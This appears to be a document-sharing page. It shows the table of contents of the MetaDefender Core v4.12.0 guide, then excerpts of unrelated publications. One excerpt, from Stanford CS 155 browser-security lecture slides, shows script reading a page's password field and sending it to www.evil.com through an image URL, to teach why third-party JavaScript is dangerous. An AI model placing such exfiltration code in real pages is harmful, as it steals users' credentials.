Metadefender Core V4.12.0

Total Page:16

File Type:pdf, Size:1020Kb

Metadefender Core V4.12.0 MetaDefender Core v4.12.0 © 2018 OPSWAT, Inc. All rights reserved. OPSWAT®, MetadefenderTM and the OPSWAT logo are trademarks of OPSWAT, Inc. All other trademarks, trade names, service marks, service names, and images mentioned and/or used herein belong to their respective owners. Table of Contents About This Guide 13 Key Features of Metadefender Core 14 1. Quick Start with Metadefender Core 15 1.1. Installation 15 Operating system invariant initial steps 15 Basic setup 16 1.1.1. Configuration wizard 16 1.2. License Activation 21 1.3. Scan Files with Metadefender Core 21 2. Installing or Upgrading Metadefender Core 22 2.1. Recommended System Requirements 22 System Requirements For Server 22 Browser Requirements for the Metadefender Core Management Console 24 2.2. Installing Metadefender 25 Installation 25 Installation notes 25 2.2.1. Installing Metadefender Core using command line 26 2.2.2. Installing Metadefender Core using the Install Wizard 27 2.3. Upgrading MetaDefender Core 27 Upgrading from MetaDefender Core 3.x 27 Upgrading from MetaDefender Core 4.x 28 2.4. Metadefender Core Licensing 28 2.4.1. Activating Metadefender Licenses 28 2.4.2. Checking Your Metadefender Core License 35 2.5. Performance and Load Estimation 36 What to know before reading the results: Some factors that affect performance 36 How test results are calculated 37 Test Reports 37 Performance Report - Multi-Scanning On Linux 37 Performance Report - Multi-Scanning On Windows 41 2.6. Special installation options 46 Use RAMDISK for the tempdirectory 46 3. Configuring Metadefender Core 50 3.1. Management Console 50 3.2. Metadefender Configuration 51 3.2.1. Startup Core Configuration 51 3.2.2. Startup Node Configuration 55 3.2.3 Nginx related configuration 58 3.3. User management 58 3.3.1. Users and groups 59 3.3.2. Roles 64 3.3.3. User directories 66 3.3.4. Active Directory attributes 74 3.3.5. Change user password 77 3.4. Update settings 78 Internet 79 Folder 80 Manual 80 3.5. Clean up scan database 81 Technology Note: 81 3.6. Policies configuration 81 3.6.1. How MetaDefender Core policies work 82 3.6.2. Workflow template configuration 82 3.6.3. Security zone configuration 95 3.6.4. Workflow rule configuration 95 3.7. Logging 99 3.7.1. Configuration 100 3.7.2. Debug logging 100 3.8 Security settings on web console 101 3.8.1 Enabling HTTPS 101 3.8.2 Session timeout 105 3.9. Configuring proxy settings 106 How can I set proxy server for the product 106 3.10. External Scanners And Post Actions 107 External Scanners 107 Post Actions 110 4. Scan files with Metadefender Core 113 Scan Files via REST API 113 Scan Files via Web Interface 114 Choose what to scan and how 114 Start scanning 114 Progress of scanning 114 5. Data Sanitization 116 6. Operating Metadefender Core 117 6.1. Dashboard 117 Overview page 117 Scan history 118 Quarantine 118 Update history 118 6.2. Inventory Management 119 Certificates 119 Nodes 122 Skip by hash 124 Technologies 126 6.3. Regular Maintenance 134 Checking for Upgrades 134 Checking Engines / Databases Health 134 6.4 Import/Export configuration 134 Export 135 Import 135 Note 135 7. Metadefender Core Developer Guide 136 How to Interact with Metadefender Core using REST 136 File scan process 136 7.1. MetaDefender API Code Samples 136 Activate License Online 137 Successful response 137 Error response 138 Cancel Batch 138 Cancel Scan Batch 138 Cancel File Scan 140 Cancel Scan File 140 Close Batch 141 Close Scan Batch 141 Download Batch Signed Result 142 Download Batch Signed Result 142 Download Sanitized Files 145 Download Sanitized Files Using Data Id 145 Error response 145 Fetching Available Scan Rules 146 Successful response 147 Error response 148 Fetching Engine/Database Versions 148 Successful response 148 Error response 149 Fetch Scan Result 150 Retrieving Scan Reports Using Data ID 150 Successful response 150 Successful response with archive detection 156 Response (not existing data_id) 158 Error response 158 Fetch Scan Result by File Hash 159 Retrieve Scan Results Using Hash 159 Request http header parameters 159 The retrieved result is always the most recent for the processed item, if rule is set then it will be the most recent - if exists - under the given rule. 159 Successful response 159 Successful response with archive detection 163 Response (not existing hash) 165 Error response 165 Get Current License Information 166 Successful response 166 Error response 167 Get Product Version 167 Successful response 168 Error response 168 Initiate Batch 169 Initiate Scan Batch 169 Login / Create a Session 170 Successful response 170 Error response 171 Logout / Destroy a Session 171 Successful response 172 Error response 172 Scan A File 172 Successful response 173 Error response 173 Scan file in batch 174 Scan file in batch 174 Status of Batch 175 Status of Scan Batch 175 Uploading License Key File 176 Successful response 177 Error response 177 Vulnerability Info In Scan Result 178 Example 178 8. Advanced Metadefender Deployment 182 8.1. Scripted license management 182 Requirements 182 Activation steps 182 Deactivation steps 184 Important notes 185 8.2. Multi-node deployment 185 Setting up several Metadefender Core nodes 185 8.3. Using external load-balancer 188 8.3.1. HTTP(S) - Layer 7 load balancing 189 8.3.2. DNS load balancing 191 9. Troubleshooting Metadefender Core 195 Installation issues 195 Issues with nodes 195 Where are the Metadefender Core logs located? 195 How can I create a support package? 195 Issues under high load 195 How to Create Support Package? 196 Creating the package on Linux 196 Creating the package on Windows 196 Content of the created package 197 How to Read the Metadefender Core Log? 197 Files 197 Format 197 Severity levels of log entries 198 Inaccessible Management Console 198 How to detect 198 Solution 198 Possible Issues on Nodes 199 Q. Node detected 3rd party product on system 199 Q. There is no scan node connected 199 Too Many Sockets or Files Open 200 How to detect 200 Solution 200 Too Many TIME_WAIT Socket 201 How to detect 201 Solution 201 Technical Insights 202 10. Release notes 203 Version v4.12.0 203 Version v4.11.3 203 Version v4.11.2 203 Version v4.11.1 204 Version v4.11.0 204 Version v4.10.2 205 Version v4.10.1 205 Version v4.10.0 206 Version 4.9.1 206 Version 4.9.0 207 Version 4.8.2 207 Version 4.8.1 208 Version 4.7.2 209 Version 4.7.1 209 Version 4.6.3 210 Version 4.6.2 210 Version 4.6.1 211 Version 4.6.0 211 Version 4.5.1 212 Version 4.5.0 212 Version 4.4.1 213 Version 4.3.0 214 Version 4.2.0 215 Version 4.1.0 215 Version 4.0.1 216 Version 4.0.0 216 11. Metadefender / Client 217 About This Guide 217 Key Features of MetaDefender Client 217 Supported Operating Systems 217 1. MetaDefender Client Packages 218 MetaDefender Free Client 218 MetaDefender Premium Client 218 2. MetaDefender Premium Client 219 2.1 Install using the Install Wizard 219 2.2 Install using the Command Line 221 2.3 Using the MetaDefender Premium Client 222 2.4 Configuring through the config file 237 2.5 Configuring through Central Management 244 3. MetaDefender Free Client 249 4. Command Line Interface 249 Example: 249 Command Line Options 249 4.1 Generating and using the Administrator Password 253 5. MetaDefender Client Release Notes 255 Tips and Known Issues 255 4.1.7 Release 256 4.1.6 Release 256 4.1.5 Release 257 4.1.4 Release 257 4.1.3 Release 257 4.1.2 Release 258 4.1.1 Release 258 4.1.0 Release 259 4.0.18 Release 259 4.0.17 Release 259 4.0.16 Release 260 4.0.15 Release 260 4.0.14 Release 261 4.0.13 Release 261 4.0.12 Release 261 4.0.11 Release 262 4.0.10 Release 262 4.0.9 Release 263 4.0.8 Release 263 4.0.7 Release 264 4.0.6 Release 264 4.0.5 Release 264 4.0.4 Release (Internal Only) 265 4.0.3 Release 265 4.0.2 Release 265 4.0.1 Release 266 4.0.0 Release 266 Changes in 3.12.5 266 12. Legal 268 Copyright 268 DISCLAIMER OF WARRANTY 268 COPYRIGHT NOTICE 268 Export Classification EAR99 268 13. Knowledge Base Articles 269 Are MetaDefender Core v4 upgrades free? 270 Are there any dependencies that need to be fulfilled for MetaDefender Core v4 engines ? 270 Does Metadefender Core v4 offer real-time antivirus protection on the system where it is installed? 271 Does MetaDefender Core v4 Detect the NotPetya Ransomware? 271 Does the fixing updates for Meltdown and Spectre vulnerabilities affect any engines in MetaDefender Core v4? 274 External scanners in MetaDefender core v4.8.0 and above 275 How can I configure the maximum queue size in MetaDefender Core v4 ? 277 How can I find a sanitized file scanned with MetaDefender Core v4? 278 How can I increase the scaling up performance? 279 How can I upgrade from Core v4.7.0/v4.7.1 to a newer Core v4.7 release 281 How can the TEMP folder be changed? 282 How do I collect verbose debug packages on MetaDefender Core v4 for Linux? 283 How do I deploy MetaDefender Core v4 to an offline Linux environment? 284 Installing MetaDefender Core 284 Activate your license 285 Installing the MetaDefender Update Downloader utility 286 Applying offline updates 288 Contacting OPSWAT Support 289 How do I deploy MetaDefender Core v4 to an offline Windows environment? 289 Installing MetaDefender Core 290 Activate your license 290 Installing the MetaDefender Update Downloader utility 291 Applying offline updates 293 Contacting OPSWAT Support 294 How do I disable real-time protection of my anti-malware software if it is not allowed by corporate policy for use with MetaDefender Core v4? 294 How do I remove an engine from my MetaDefender v4 instance? 296 How do I use MetaDefender Core v4 Workflows ? 296 Defining and administering Workflow Templates in MetaDefender Core v4 297 How long is the support life cycle for a specific version/release of MetaDefender Core v4? 298 Is action needed because Metadefender v4's AVG license is expiring on 2018-06-15? 300 What do I need to do? 300 What if I don't take action by June 15, 2018? 300 Why is the license for AVG expiring? 300 What if I need more assistance from OPSWAT on this topic? 301 Is there a virus test I could use to test MetaDefender Core v4? 301 MetaDefender Core v4 shows a large number of files that failed to scan.
Recommended publications
  • Browser Code Isolation
    CS 155 Spring 2014 Browser code isolation John Mitchell Modern web sites are complex Modern web “site” Code from many sources Combined in many ways Sites handle sensitive information ! Financial data n" Online banking, tax filing, shopping, budgeting, … ! Health data n" Genomics, prescriptions, … ! Personal data n" Email, messaging, affiliations, … Others want this information ! Financial data n" Black-hat hackers, … ! Health data n" Insurance companies, … ! Personal data n" Ad companies, big government, … Modern web “site” Code from many sources Combined in many ways Basic questions ! How do we isolate code from different sources n" Protecting sensitive information in browser n" Ensuring some form of integrity n" Allowing modern functionality, flexible interaction Example:Library ! Library included using tag n" <script src="jquery.js"></script> ! No isolation n" Same frame, same origin as rest of page ! May contain arbitrary code n" Library developer error or malicious trojan horse n" Can redefine core features of JavaScript n" May violate developer invariants, assumptions jQuery used by 78% of the Quantcast top 10,000 sites, over 59% of the top million Second example: advertisement <script src=“https://adpublisher.com/ad1.js”></script> <script src=“https://adpublisher.com/ad2.js”></script>! ! Read password using the DOM API var c = document.getElementsByName(“password”)[0] Directly embedded third-party JavaScript poses a threat to critical hosting page resources Send it to evil location (not subject to SOP) <img src=``http::www.evil.com/info.jpg?_info_”>
    [Show full text]
  • Red Hat Enterprise Linux 8 Installing, Managing, and Removing User-Space Components
    Red Hat Enterprise Linux 8 Installing, managing, and removing user-space components An introduction to AppStream and BaseOS in Red Hat Enterprise Linux 8 Last Updated: 2021-06-25 Red Hat Enterprise Linux 8 Installing, managing, and removing user-space components An introduction to AppStream and BaseOS in Red Hat Enterprise Linux 8 Legal Notice Copyright © 2021 Red Hat, Inc. The text of and illustrations in this document are licensed by Red Hat under a Creative Commons Attribution–Share Alike 3.0 Unported license ("CC-BY-SA"). An explanation of CC-BY-SA is available at http://creativecommons.org/licenses/by-sa/3.0/ . In accordance with CC-BY-SA, if you distribute this document or an adaptation of it, you must provide the URL for the original version. Red Hat, as the licensor of this document, waives the right to enforce, and agrees not to assert, Section 4d of CC-BY-SA to the fullest extent permitted by applicable law. Red Hat, Red Hat Enterprise Linux, the Shadowman logo, the Red Hat logo, JBoss, OpenShift, Fedora, the Infinity logo, and RHCE are trademarks of Red Hat, Inc., registered in the United States and other countries. Linux ® is the registered trademark of Linus Torvalds in the United States and other countries. Java ® is a registered trademark of Oracle and/or its affiliates. XFS ® is a trademark of Silicon Graphics International Corp. or its subsidiaries in the United States and/or other countries. MySQL ® is a registered trademark of MySQL AB in the United States, the European Union and other countries.
    [Show full text]
  • Comparison of Common Xml-Based Web User Interface Languages
    Journal of Web Engineering, Vol. 9, No. 2 (2010) 095–115 c Rinton Press COMPARISON OF COMMON XML-BASED WEB USER INTERFACE LANGUAGES MIKKO POHJA Department of Media Technology, Aalto University P.O. Box 15400, FI-00076 Aalto, Finland mikko.pohja@hut.fi Received August 1, 2009 Revised February 25, 2010 In addition to being a platform for information access, the World Wide Web is increas- ingly becoming an application platform. While web applications have several benefits compared to desktop applications, there are also some problems. With legacy HTML, for example, one cannot produce user interfaces such as those that users have become accustomed to with desktop applications. What worked for static documents is not suf- ficient for the complicated web applications of today. Several parties have addressed this problem by defining a specific UI description language. In addition, the renewal of HTML aims to enhance support for web applications. This study evaluated five XML- based UI description formats, including HTML 5, in order to determine which language is best suited for modern web application development. The study also assessed what kind of applications are suited to each format. The requirements for a Web UI descrip- tion language from the literature were revised and three use cases were defined, through which the languages are evaluated. The paper also presents the model differences of the languages. Keywords: Web User Interface Description Language, Web Application Communicated by: D. Lowe & O. Pastor 1 Introduction Commerce and communication tasks, such as the use of e-mail, are common today on the World Wide Web (WWW), as is a trend towards realizing higher interaction tasks, such as in- formation authoring.
    [Show full text]
  • List of Open Source Components Used by Intel® Deployment Assistant
    List of open source components used by Intel® Deployment Assistant S. No Component Link for additional info 1 ALFS 6.1 (Gerard Beekmans) http://www.linuxfromscratch.org/ 2 autoconf-2.59.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 3 automake-1.9.6.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 4 bash-3.1.tar.gz ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 5 bash-3.1-fixes-8.patch ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 6 binutils-2.16.1.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 7 bison-2.2.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 8 bzip2-1.0.3.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 9 coreutils-6.3.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 10 coreutils-6.3-i18n-1.patch ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 11 coreutils-6.3- suppress_uptime_kill_su-1.patch ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 12 coreutils-6.3-uname-1.patch ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 13 dejagnu-1.4.4.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 14 diffutils-2.8.1.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 15 diffutils-2.8.1-i18n-1.patch ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 16 e2fsprogs-1.39.tar.gz ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 17 expect-5.43.0.tar.bz2 ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/ 18 expect-5.43.0-spawn-1.patch ftp://anduin.linuxfromscratch.org/LFS/lfs-packages/6.2/
    [Show full text]
  • Kinect Based Painter
    PiccasoNect – - Kinect based Painter Introduction Kinect is a line of motion sensing input devices by Microsoft for Xbox 360 and Xbox One video game consoles and Windows PCs. Based around a webcam-style add-on peripheral, it enables users to control and interact with their console/computer without the need for a game controller, through a natural user interface using gestures and spoken commands. Kinect sensor is based on Prime-Sense technology and there are similar sensors on the market such as Asus Xtion and PrimeSense Carmine. (http://en.wikipedia.org/wiki/Kinect) Windows Presentation Foundation (or WPF) is a graphical subsystem for rendering user interfaces in Windows-based applications by Microsoft. WPF attempts to provide a consistent programming model for building applications and separates the user interface from business logic. It resembles similar XML-oriented object models, such as those implemented in XUL and SVG. (http://en.wikipedia.org/wiki/Windows_Presentation_Foundation) Overview In the project we developed a WPF application which allows the user to create a painting using his hands with minimal interactions with the mouse and keyboard. Using the Kinect, the application follows the user's hands movements, and translates them to a brush strokes. The application allows the user to select a brush from several rendering methods. Application requirements Capture user movements using Kinect sensor Paint the desired brush according to the user hands movements Enable several rendering options to choose from Option to save and send via email the finished painting Project Infrastructure The project is A WPF application, based on Microsoft Kinect SDK 1.7.
    [Show full text]
  • Metadefender Core V4.12.2
    MetaDefender Core v4.12.2 © 2018 OPSWAT, Inc. All rights reserved. OPSWAT®, MetadefenderTM and the OPSWAT logo are trademarks of OPSWAT, Inc. All other trademarks, trade names, service marks, service names, and images mentioned and/or used herein belong to their respective owners. Table of Contents About This Guide 13 Key Features of Metadefender Core 14 1. Quick Start with Metadefender Core 15 1.1. Installation 15 Operating system invariant initial steps 15 Basic setup 16 1.1.1. Configuration wizard 16 1.2. License Activation 21 1.3. Scan Files with Metadefender Core 21 2. Installing or Upgrading Metadefender Core 22 2.1. Recommended System Requirements 22 System Requirements For Server 22 Browser Requirements for the Metadefender Core Management Console 24 2.2. Installing Metadefender 25 Installation 25 Installation notes 25 2.2.1. Installing Metadefender Core using command line 26 2.2.2. Installing Metadefender Core using the Install Wizard 27 2.3. Upgrading MetaDefender Core 27 Upgrading from MetaDefender Core 3.x 27 Upgrading from MetaDefender Core 4.x 28 2.4. Metadefender Core Licensing 28 2.4.1. Activating Metadefender Licenses 28 2.4.2. Checking Your Metadefender Core License 35 2.5. Performance and Load Estimation 36 What to know before reading the results: Some factors that affect performance 36 How test results are calculated 37 Test Reports 37 Performance Report - Multi-Scanning On Linux 37 Performance Report - Multi-Scanning On Windows 41 2.6. Special installation options 46 Use RAMDISK for the tempdirectory 46 3. Configuring Metadefender Core 50 3.1. Management Console 50 3.2.
    [Show full text]
  • Troubleshooting Guide
    Java Platform, Standard Edition Troubleshooting Guide Release 9 E61074-05 October 2017 Java Platform, Standard Edition Troubleshooting Guide, Release 9 E61074-05 Copyright © 1995, 2017, Oracle and/or its affiliates. All rights reserved. This software and related documentation are provided under a license agreement containing restrictions on use and disclosure and are protected by intellectual property laws. Except as expressly permitted in your license agreement or allowed by law, you may not use, copy, reproduce, translate, broadcast, modify, license, transmit, distribute, exhibit, perform, publish, or display any part, in any form, or by any means. Reverse engineering, disassembly, or decompilation of this software, unless required by law for interoperability, is prohibited. The information contained herein is subject to change without notice and is not warranted to be error-free. If you find any errors, please report them to us in writing. If this is software or related documentation that is delivered to the U.S. Government or anyone licensing it on behalf of the U.S. Government, then the following notice is applicable: U.S. GOVERNMENT END USERS: Oracle programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, delivered to U.S. Government end users are "commercial computer software" pursuant to the applicable Federal Acquisition Regulation and agency- specific supplemental regulations. As such, use, duplication, disclosure, modification, and adaptation of the programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, shall be subject to license terms and license restrictions applicable to the programs. No other rights are granted to the U.S.
    [Show full text]
  • Sunvox User Manual 2021.09.04
    SunVox User Manual 2021.09.04 What is SunVox List of terms Minimum system requirements Installing Comparison of different versions Interface description Main menu Keyboard shortcuts Basic concepts Project Pattern Pattern effects MIDI Out Interpolator Module Controllers Controller automation Modes Timeline Internal modules Synths Analog Generator DrumSynth FM Generator Input Kicker Vorbis player Sampler SpectraVoice Effects Amplifier Compressor DC Blocker Delay Distortion Echo EQ Filter Filter Pro Flanger LFO Loop Modulator Pitch Shifter Reverb Vocal Filter Vibrato WaveShaper Misc ADSR Ctl2Note Feedback Glide GPIO MetaModule MultiCtl MultiSynth Pitch2Ctl Pitch Detector Sound2Ctl Velocity2Ctl Preferences Configuration file Links Frequently asked questions (FAQ) Interface Modules, samples, effects Sound MIDI Other iOS Android macOS What is SunVox SunVox is a small, fast and powerful modular synthesizer with pattern based sequencer (tracker). It is a tool for those people who like to compose music wherever they are, whenever they wish. On any device. On any system. Official SunVox page List of terms Amplitude - value (position on the Y-axis) of one sample of the digital audio signal, or the maximum value of the sound wave displacement (relative to zero) during the period (if we are talking about oscillations of the generator); Audio signal - representation of sound in the form of a graph (wave), process of changing the amplitude over time; in analog audio, amplitude is the voltage level; in digital audio, amplitude is a discrete value (usually
    [Show full text]
  • Licensing Information User Manual Release 8.0 E65472-04
    Oracle® Communications Calendar Server Licensing Information User Manual Release 8.0 E65472-04 March 2021 Copyright © 2000, 2021, Oracle and/or its affiliates. All rights reserved. This software and related documentation are provided under a license agreement containing restrictions on use and disclosure and are protected by intellectual property laws. Except as expressly permitted in your license agreement or allowed by law, you may not use, copy, reproduce, translate, broadcast, modify, license, transmit, distribute, exhibit, perform, publish, or display any part, in any form, or by any means. Reverse engineering, disassembly, or decompilation of this software, unless required by law for interoperability, is prohibited. The information contained herein is subject to change without notice and is not warranted to be error-free. If you find any errors, please report them to us in writing. If this is software or related documentation that is delivered to the U.S. Government or anyone licensing it on behalf of the U.S. Government, then the following notice is applicable: U.S. GOVERNMENT END USERS: Oracle programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, delivered to U.S. Government end users are “commercial computer software” pursuant to the applicable Federal Acquisition Regulation and agency-specific supplemental regulations. As such, use, duplication, disclosure, modification, and adaptation of the programs, including any operating system, integrated software, any programs installed on the hardware, and/or documentation, shall be subject to license terms and license restrictions applicable to the programs. No other rights are granted to the U.S. Government.
    [Show full text]
  • Multi-Platform User Interface Construction – a Challenge for Software Engineering-In-The-Small
    Multi-platform User Interface Construction – A Challenge for Software Engineering-in-the-Small Judith Bishop Department of Computer Science University of Pretoria Pretoria 0002 South Africa [email protected] ABSTRACT The popular view of software engineering focuses on managing 1. INTRODUCTION teams of people to produce large systems. This paper addresses a 1.1 Software engineering different angle of software engineering, that of development for Software engineering as a discipline is perceived as tackling re-use and portability. We consider how an essential part of computing in-the-large. It elevates tools and techniques from the most software products – the user interface – can be successfully level of a craft, to where they can be efficiently and reproducibly engineered so that it can be portable across multiple platforms harnessed for the successful completion of large projects. and on multiple devices. Our research has identified the structure of the problem domain, and we have filled in some of Thirty years ago in 1975, Fred Brooks introduced us to the the answers. We investigate promising solutions from the mythical man month of software development [Brooks 1975] model-driven frameworks of the 1990s, to modern XML-based and followed this with the “no silver bullet” paper, in which he specification notations (Views, XUL, XIML, XAML), multi- talked about software engineering as being a process of building platform toolkits (Qt and Gtk), and our new work, Mirrors software with “specifications, assembly of components, and which pioneers reflective libraries. The methodology on which scaffolding” [Brooks 1987]. Boehm, too, found in 1976 that Views and Mirrors is based enables existing GUI libraries to be software engineering was, encouragingly, concentrating on the transported to new operating systems.
    [Show full text]
  • Nextflow Documentation
    Nextflow Documentation Release 0.30.2 Paolo Di Tommaso Jul 12, 2018 Contents 1 Get started 3 1.1 Requirements...............................................3 1.2 Installation................................................3 1.3 Your first script..............................................3 2 Basic concepts 7 2.1 Processes and channels..........................................7 2.2 Execution abstraction..........................................8 2.3 Scripting language............................................9 2.4 Configuration options..........................................9 3 Pipeline script 11 3.1 Language basics............................................. 11 3.2 Closures................................................. 14 3.3 Regular expressions........................................... 15 3.4 Files and I/O............................................... 17 4 Processes 27 4.1 Script................................................... 28 4.2 Inputs................................................... 32 4.3 Outputs.................................................. 39 4.4 When................................................... 44 4.5 Directives................................................. 44 5 Channels 63 5.1 Channel factory............................................. 63 5.2 Binding values.............................................. 67 5.3 Observing events............................................. 68 6 Operators 71 6.1 Filtering operators............................................ 71 6.2 Transforming operators........................................
    [Show full text]
  • Zip Plugin 1.1 Read and Write Zip Archives with Hollywood
    Zip Plugin 1.1 Read and write zip archives with Hollywood Andreas Falkenhahn i Table of Contents 1 General information::::::::::::::::::::::::::::: 1 1.1 Introduction :::::::::::::::::::::::::::::::::::::::::::::::::::: 1 1.2 Terms and conditions ::::::::::::::::::::::::::::::::::::::::::: 1 1.3 Requirements::::::::::::::::::::::::::::::::::::::::::::::::::: 2 1.4 Installation ::::::::::::::::::::::::::::::::::::::::::::::::::::: 2 2 About zip.hwp ::::::::::::::::::::::::::::::::::: 3 2.1 Credits ::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 3 2.2 Frequently asked questions:::::::::::::::::::::::::::::::::::::: 3 2.3 Known issues ::::::::::::::::::::::::::::::::::::::::::::::::::: 3 2.4 Future:::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 3 2.5 History ::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 3 3 Usage ::::::::::::::::::::::::::::::::::::::::::::: 5 3.1 Activating the plugin ::::::::::::::::::::::::::::::::::::::::::: 5 3.2 Zip archives as directories::::::::::::::::::::::::::::::::::::::: 5 3.3 Extracting files ::::::::::::::::::::::::::::::::::::::::::::::::: 6 3.4 Zip archive basics::::::::::::::::::::::::::::::::::::::::::::::: 6 3.5 Creating zip archives ::::::::::::::::::::::::::::::::::::::::::: 7 3.6 Linking files :::::::::::::::::::::::::::::::::::::::::::::::::::: 7 4 Function reference::::::::::::::::::::::::::::::: 9 4.1 zip.AddDirectory ::::::::::::::::::::::::::::::::::::::::::::::: 9 4.2 zip.AddFile::::::::::::::::::::::::::::::::::::::::::::::::::::: 9 4.3 zip.CloseArchive:::::::::::::::::::::::::::::::::::::::::::::::
    [Show full text]